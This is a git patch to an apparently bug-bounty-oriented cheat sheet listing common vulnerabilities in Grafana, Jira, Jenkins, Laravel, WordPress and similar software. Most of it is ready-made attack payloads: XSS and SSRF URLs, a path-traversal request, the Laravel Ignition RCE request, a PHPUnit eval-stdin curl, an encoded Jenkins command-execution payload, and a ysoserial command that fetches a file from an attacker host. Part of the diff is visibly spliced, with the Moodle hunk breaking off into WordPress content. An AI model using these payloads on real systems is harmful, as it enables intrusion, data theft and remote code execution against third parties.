From a0048665a163783f47fae454b0716a490b237e88 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa Date: Sat, 18 Jun 2022 20:26:55 +0700 Subject: [PATCH] Adding some 'technology' information --- Technologies/Grafana.md | 10 ++--- Technologies/HAProxy.md | 9 ++++- Technologies/Jenkins.md | 41 +++++++++++++------- Technologies/Jira.md | 78 ++++++++++++++++++++++++++------------- Technologies/Laravel.md | 50 +++++++++++++++++-------- Technologies/Moodle.md | 16 +++++++- Technologies/Nginx.md | 20 +++++++++- Technologies/WordPress.md | 8 ++++ Technologies/Zend.md | 4 +- 9 files changed, 169 insertions(+), 67 deletions(-) diff --git a/Technologies/Grafana.md b/Technologies/Grafana.md index ed6f20c..22bd35a 100644 --- a/Technologies/Grafana.md +++ b/Technologies/Grafana.md @@ -1,16 +1,16 @@ # Grafana 1. CVE-2021-41174 (Reflected XSS) ``` -/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1 +https://example.com/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1 ``` 2. CVE-2020-13379 (Denial of Service) ``` -/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D +https://example.com/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D ``` 3. CVE-2020-11110 (Stored XSS) ``` POST /api/snapshots HTTP/1.1 -Host: +Host: example.com Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Referer: {{BaseURL}} @@ -22,7 +22,7 @@ Connection: close 4. CVE-2019-15043 (Grafana Unauthenticated API) ``` POST /api/snapshots HTTP/1.1 -Host: +Host: example.com Connection: close Content-Length: 235 Accept: */* @@ -37,5 +37,5 @@ Try to login using admin as username and password ``` 6. Signup Enabled ``` -/signup +https://example.com/signup ``` \ No newline at end of file diff --git a/Technologies/HAProxy.md b/Technologies/HAProxy.md index 52ceeb1..3471bd6 100644 --- a/Technologies/HAProxy.md +++ b/Technologies/HAProxy.md @@ -1,4 +1,11 @@ -# HAProxy +# HAProxy Common Bugs + +## Introduction +What would you do if you came across a website that uses HAProxy? + +## How to Detect +- + 1. CVE-2021-40346 (HTTP Request Smuggling) ``` POST /index.html HTTP/1.1 diff --git a/Technologies/Jenkins.md b/Technologies/Jenkins.md index f52e3d0..ea44888 100644 --- a/Technologies/Jenkins.md +++ b/Technologies/Jenkins.md @@ -1,5 +1,18 @@ -## Jenkins -1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older) +# Jenkins Common Bugs + +## Introduction +What would you do if you came across a website that uses Jenkins? + +## How to Detect +Usually in the HTTP response there is a header like this `X-Jenkins` + +1. Find the related CVE by checking jenkins version +* How to find the jenkins version + +By checking the response header `X-Jenkins`, sometimes the version is printed there. If you found outdated jenkins version, find the exploit at [pwn_jenkins](https://github.com/gquere/pwn_jenkins) + +Some example CVE: +- Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older) Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload. Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py): @@ -9,7 +22,7 @@ java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.s ./jenkins_rce.py jenkins_ip jenkins_port payload.out ``` -2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1) +- Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1) Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html). @@ -18,13 +31,9 @@ If the Jenkins requests authentication but returns valid data using the followin curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a ``` -3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002) - -Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce). - Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc). -4. CVE-2019-1003030 +- CheckScript RCE in Jenkins (CVE-2019-1003030) How to Exploit: - [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html) @@ -56,11 +65,15 @@ to %70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d -5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392) +2. Default Credentials +``` +Try to login using admin as username and password +``` -How to exploit: -- [@jas502n](https://github.com/jas502n/CVE-2019-10392) -- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html) +3. Unauthenticated Jenkins Dashboard +``` +Access https://target.com and if there is no login form then it is vulnerable +``` -Reference: -- https://github.com/gquere/pwn_jenkins \ No newline at end of file +## Reference +* [pwn_jenkins](https://github.com/gquere/pwn_jenkins) \ No newline at end of file diff --git a/Technologies/Jira.md b/Technologies/Jira.md index 291f004..e17d37b 100644 --- a/Technologies/Jira.md +++ b/Technologies/Jira.md @@ -1,48 +1,65 @@ -# Unauthenticated Jira CVEs -1. CVE-2017-9506 (SSRF) +# Jira Common Bugs + +## Introduction +What would you do if you came across a website that uses Jira? + +## How to Detect ``` -https:///plugins/servlet/oauth/users/icon-uri?consumerUri= +https://example.com/secure/Dashboard.jspa +https://example.com/login.jsp ``` -2. CVE-2018-20824 (XSS) + +1. Find the related CVE by checking jira version +* How to find the jira version + +Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `` so 8.20.9 is the version jira. If you found outdated jira version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html) + +Some example CVE: + +- CVE-2017-9506 (SSRF) ``` -https:///plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) +https://example.com/plugins/servlet/oauth/users/icon-uri?consumerUri= ``` -3. CVE-2019-8451 (SSRF) +- CVE-2018-20824 (XSS) ``` -https:///plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com +https://example.com/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) ``` -4. CVE-2019-8449 (User Information Disclosure) +- CVE-2019-8451 (SSRF) ``` -https:///rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true +https://example.com/plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com ``` -5. CVE-2019-8442 (Sensitive Information Disclosure) +- CVE-2019-8449 (User Information Disclosure) ``` -https:///s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml +https://example.com/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true ``` -6. CVE-2019-3403 (User Enumeration) +- CVE-2019-8442 (Sensitive Information Disclosure) ``` -https:///rest/api/2/user/picker?query= +https://example.com/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml ``` -7. CVE-2020-14181 (User Enumeration) +- CVE-2019-3403 (User Enumeration) ``` -https:///secure/ViewUserHover.jspa?username= +https://example.com/rest/api/2/user/picker?query= ``` -8. CVE-2020-14178 (Project Key Enumeration) +- CVE-2020-14181 (User Enumeration) ``` -https:///browse. +https://example.com/secure/ViewUserHover.jspa?username= ``` -9. CVE-2020-14179 (Information Disclosure) +- CVE-2020-14178 (Project Key Enumeration) ``` -https:///secure/QueryComponent!Default.jspa +https://example.com/browse. ``` -10. CVE-2019-11581 (Template Injection) +- CVE-2020-14179 (Information Disclosure) ``` -/secure/ContactAdministrators!default.jspa +https://example.com/secure/QueryComponent!Default.jspa +``` +- CVE-2019-11581 (Template Injection) +``` +example.com/secure/ContactAdministrators!default.jspa * Try the SSTI Payloads ``` -11. CVE-2019-3396 (Path Traversal) +- CVE-2019-3396 (Path Traversal) ``` POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: {{Hostname}} @@ -56,10 +73,19 @@ Connection: close *Try above request with the Jira target ``` -12. CVE-2019-3402 (XSS) +- CVE-2019-3402 (XSS) ``` -https:///secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search +https://example.com/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search ``` -Reference: -- https://twitter.com/harshbothra \ No newline at end of file +2. Signup enabled +``` +POST /servicedesk/customer/user/signup HTTP/1.1 +Host: example.com +Content-Type: application/json + +{"email":"test@gmail.com","signUpContext":{},"secondaryEmail":"","usingNewUi":true} +``` + +## Reference +* [@harshbothra](https://twitter.com/harshbothra) \ No newline at end of file diff --git a/Technologies/Laravel.md b/Technologies/Laravel.md index e4161d0..27a49e1 100644 --- a/Technologies/Laravel.md +++ b/Technologies/Laravel.md @@ -1,26 +1,46 @@ -# Common bug in laravel framework -1. Laravel PHPUnit Remote Code Execution -* Full Path Exploit : http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php -* Affected versions : Before 4.8.28 and 5.x before 5.6.3 +# Laravel Common Bugs -Command +## Introduction +What would you do if you came across a website that uses Laravel? + +## How to Detect +Usually in the HTTP response there is a header like this `Set-Cookie: laravel_session=` + +1. Find the related CVE by checking laravel version +* How to find the laravel version + +By checking the composer file in `https://example.com/composer.json`, sometimes the version is printed there. If you found outdated laravel version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-16542/product_id-38139/Laravel-Laravel.html) + +Some example CVE: + +- CVE-2021-3129 (Remote Code Execution) ``` -curl -d "" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php +POST /_ignition/execute-solution HTTP/1.1 +Host: example.com +Accept: application/json +Content-Type: application/json + +{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} ``` -2. Exposed environment variables -* Full Path Exploit : http://target.com/.env +2. Laravel 4.8.28 ~ 5.x - PHPUnit Remote Code Execution (CVE-2017-9841) +``` +curl -d "" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php +``` + +3. Exposed environment variables +* Full Path Exploit : http://example.com/.env ![Environment Variables](https://1.bp.blogspot.com/-EUTxgP5XE6Q/XkgB4SyWSbI/AAAAAAAAAQA/eqtALOjLKKA46si-lIosm6cDVmxByjzIQCLcBGAsYHQ/s1600/1.png) -3. Exposed log files -* Full Path Exploit : http://target.com/storage/logs/laravel.log +4. Exposed log files +* Full Path Exploit : http://example.com/storage/logs/laravel.log -4. Laravel Debug Mode Enabled -* Using SQL injection query in GET or POST method -* Try path /logout (ex:target.com/logout) -* Using [] in paramater (ex:target.com/param[]=0) +5. Laravel Debug Mode Enabled +* Try to request to https://example.com using POST method (Error 405) +* Using [] in paramater (ex:example.com/param[]=0) ![Laravel Debug Mode](https://hacken.io/wp-content/uploads/2019/07/laravel-screen.png) -Source: [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html) +## References +* [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html) diff --git a/Technologies/Moodle.md b/Technologies/Moodle.md index bcd6c50..7ebd339 100644 --- a/Technologies/Moodle.md +++ b/Technologies/Moodle.md @@ -1,4 +1,10 @@ -# Moodle +# Moodle Common Bugs + +## Introduction +What would you do if you came across a website that uses Moodle? + +## How to Detect +If you visit `https://target.com` and see the source code, you will see ` ``` + +7. Register enabled +``` +http://example.com/wp-login.php?action=register +``` \ No newline at end of file diff --git a/Technologies/Zend.md b/Technologies/Zend.md index f0d0b5a..048dbe8 100644 --- a/Technologies/Zend.md +++ b/Technologies/Zend.md @@ -1,10 +1,10 @@ -# Common bug in Zend framework +# Zend Common Bugs ## Introduction What would you do if you came across a website that uses Zend? ## How to Detect - +- 1. Finding config files ```